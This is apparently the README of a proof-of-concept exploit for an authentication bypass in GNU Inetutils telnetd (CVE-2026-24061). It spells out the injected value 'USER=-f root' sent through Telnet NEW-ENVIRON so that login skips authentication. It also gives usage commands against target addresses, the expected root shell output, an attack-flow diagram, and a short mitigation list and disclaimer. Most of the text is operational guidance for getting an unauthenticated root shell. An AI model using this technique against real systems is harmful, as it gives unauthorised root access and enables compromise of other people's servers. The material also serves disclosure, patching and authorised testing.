Share
## https://sploitus.com/exploit?id=A7C4159E-E3CD-5EBB-972E-25FCDE265C18
![Author](https://img.shields.io/badge/Author-Mohammed%20Idrees%20Banyamer-red)
![Role](https://img.shields.io/badge/Role-Security%20Researcher-blue)
![Country](https://img.shields.io/badge/Country-Jordan-black)
![Platform](https://img.shields.io/badge/Platform-Linux-blue)
![Vulnerability](https://img.shields.io/badge/Vuln-Authentication%20Bypass-critical)
![CVE](https://img.shields.io/badge/CVE-2026--24061-orange)
![CVSS](https://img.shields.io/badge/CVSS-9.8-critical)
![Status](https://img.shields.io/badge/Exploit-PoC-success)



---

## 🧨 Overview

This repository contains a Proof‑of‑Concept exploit for **GNU Inetutils telnetd** remote authentication bypass vulnerability.

The issue arises because telnetd improperly sanitizes the **USER** environment variable received via Telnet **NEW‑ENVIRON** negotiation before invoking `/bin/login`.

By supplying:

```
USER=-f root
```

telnetd effectively executes:

```
/bin/login -f root
```

which bypasses authentication and spawns an immediate **root shell**.

* **Product:** GNU Inetutils telnetd
* **Affected Versions:** ≤ 2.7
* **Port:** 23/TCP
* **Auth:** Not required
* **Impact:** Authentication Bypass → Root Shell
* **Privileges:** root
* **CVE:** CVE‑2026‑24061
* **CVSS:** 9.8 (Critical)

---

## ⚙️ Technical Details

Telnet NEW‑ENVIRON allows clients to set environment variables during session negotiation.

Vulnerable telnetd passes USER directly to login:

```
/bin/login -f "$USER"
```

An attacker sets:

```
USER=-f root
```

Result:

```
/bin/login -f root
```

The `-f` flag tells login to **skip authentication**, granting root access.

---

## 📦 Requirements

* Python 3
* telnetlib (standard library)
* Target running vulnerable inetutils‑telnetd ≤ 2.7
* Telnet service reachable on TCP/23

No external dependencies required.

---

## 🚀 Usage

### 1️⃣ Run Exploit

```bash
python3 cve-2026-24061.py 192.168.1.100
```

---

### 2️⃣ Optional Port

```bash
python3 cve-2026-24061.py example.com 23
```

---

### 3️⃣ Expected Result

If vulnerable:

```
# id
uid=0(root) gid=0(root)
#
```

You now have an interactive root shell.

---

## 🧪 Example

```bash
python3 cve-2026-24061.py 10.10.10.20
```

Output:

```
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
```

---

## 🧯 Notes

* Exploit is **instant**
* No brute force required
* No credentials required
* Observed exploited in the wild
* Works on default Debian/Ubuntu inetutils‑telnetd installs
* Fails if telnetd patched or replaced (e.g., OpenBSD telnetd)

---

## 🛡️ Mitigation

* Upgrade GNU Inetutils ≥ 2.8
* Disable telnet service
* Replace with SSH
* Block TCP/23 at firewall
* Audit inetutils‑telnetd packages

---

## 📊 PoC Attack Flow

```mermaid
sequenceDiagram
    participant A as Attacker
    participant T as Target telnetd
    participant L as /bin/login
    participant R as Root Shell

    A->>T: Connect TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Execute /bin/login -f root
    L-->>T: Auth bypass success
    T-->>R: Spawn root shell
    R-->>A: Interactive root session
```

---

## ⚠️ Disclaimer

This exploit is provided for:

* Security research
* Authorized penetration testing
* Defensive validation

Unauthorized use against systems you do not own or have permission to test is illegal.